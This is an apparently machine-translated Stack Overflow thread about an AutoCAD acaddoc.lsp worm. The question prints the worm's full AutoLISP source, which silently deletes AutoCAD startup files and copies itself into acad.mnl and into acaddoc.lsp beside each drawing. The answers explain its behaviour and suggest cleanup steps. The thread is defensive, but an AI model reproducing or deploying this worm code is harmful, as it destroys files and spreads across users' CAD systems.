14

acaddoc.lsp私の会社は、AutoCAD ウイルスに感染し、以下のルーチンで削除され、置き換えられました。

私はアーキテクトであり、「検索」と「削除」の繰り返しによってこれが何をしているのか正確にはわかりません。

質問

  1. ファイルを (現在検索中acadapq) に置き換えるのは何ですか?
  2. AutoCAD のウイルスを作成するのは誰?!?!

誰もこれを見たことがありますか?CAD フォーラムはあまり役に立ちません。

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
      (if (vl-file-delete (findfile "acad.lsp"))
          (setq n 0))
      (setq n 2)))

(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
      (progn
        (setq wwjm (open woldacad "r"))
        (while (setq wwz (read-line wwjm))
          (write-line wwz wwjm1))
        (close wwjm)
        (close wwjm1))))

(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq ab (atoi (substr wz 4 1)))
      (close wwjm)
      (if (> ab bb)
          (setq lbz 1))))

(setq wwjqm (strcat wpath "acad.mnl"))

(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq nb (atoi (substr wz 4 1)))
      (close wwjm)
      (if (< nb bb)
          (setq lbz 1)))
    (setq lbz 1))
(if (= lbz 1)
    (progn
      (setq woldacad (strcat dpath "acaddoc.lsp"))
      (setq wnewacad (strcat wpath "acad.mnl"))
      (wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
    (progn
      (setq woldacad (strcat wpath "acad.mnl"))
      (setq wnewacad (strcat dpath "acaddoc.lsp"))
      (wwriteapp))
    (vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)
4

3 に答える 3

10

一般的な AutoCAD カスタマイズ ファイルのサポート ファイル パス ウォーク、削除、置換を行っています。("acad.fas","acad.lsp", "acaddoc.lsp") "lcm.fas" の意味がわかりません。AutoCAD 垂直製品、つまり AutoCAD Mechanical または Architectural デスクトップの一部ですか?

ループは基本的に「サポート パスで見つけている間は削除する」ことです。

私の知る限り、AutoCAD にはこれに対する防御機能が組み込まれていません。(これらのファイルの実行を停止する acad システム変数が存在する場合があります)。

「cmdecho」行は、コマンドのエコーを許可/抑制するシステム変数を保存および復元しています。実行中はオフにして(気付かないように)、元の設定に戻します。

礼儀正しいウイルス :\

AutoCAD が起動すると、最初の「acad.fas」とサポート パスで見つかった最初の「acad.lsp」が実行されます。AutoCAD は新しい .dwg をロードするたびに、「acaddoc.lsp」を実行します。

于 2009-12-14T20:28:54.630 に答える
1

次の手順に従って、このワームを駆除してください。

添付のルーチンを PC に手動でコピーします: acaddocfix_1.6.lsp
APPLOAD コマンドを使用して Lisp ファイルをロードします
Lisp ファイルは自動的に実行され、サポート フォルダ内のすべてのワームが削除されます。

それらは別の方法ですが、以前にITに確認したように、ユーザーがPCを起動したらバッチファイルとして追加することで実行できます

自動実行 アンチウイルスまたはクリーナーを実行して、「acaddoc.lsp」ファイルを取り除きます。通常、クリーナー ルーチンは acad20XXdoc.lsp ファイルに単純なルーチンをインストールし、これらのファイルを自動的にクリーニングしますが、最初にアンチウィルスですべてのウィルスをクリーニングすることをお勧めします。-acaddoc.bat dos バッチ ファイルを実行して、すべてのドライブを手動でクリーニングすることもできます。このバッチを 1 回実行すると、システム上のすべての acaddoc.lsp ファイルが削除されます。

注: Autocad Support フォルダ内の感染ファイルのいずれかが読み取り専用の場合、クリーナーはそれらのファイルを駆除できません!!

http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/を参照してください。

于 2011-04-09T09:29:39.143 に答える
0

ワイルドなことは、ファイルがネットワーク上で開かれたときにのみlispファイルが作成されることです。ローカルコピーにはこの問題はないようです。すべてのユーザーのログインスクリプトにdel/sacaddoc.lspとdel/s acad.lspを追加し、これを1週間ほど実行すると、ウイルスが侵入するすべてのacaddoc.lspファイルとacad.lspファイルが削除されます。 .deleteコマンドを実行する前に、これらのファイルを実際に自分の目的で使用しないようにしてください。

于 2011-04-07T07:43:14.627 に答える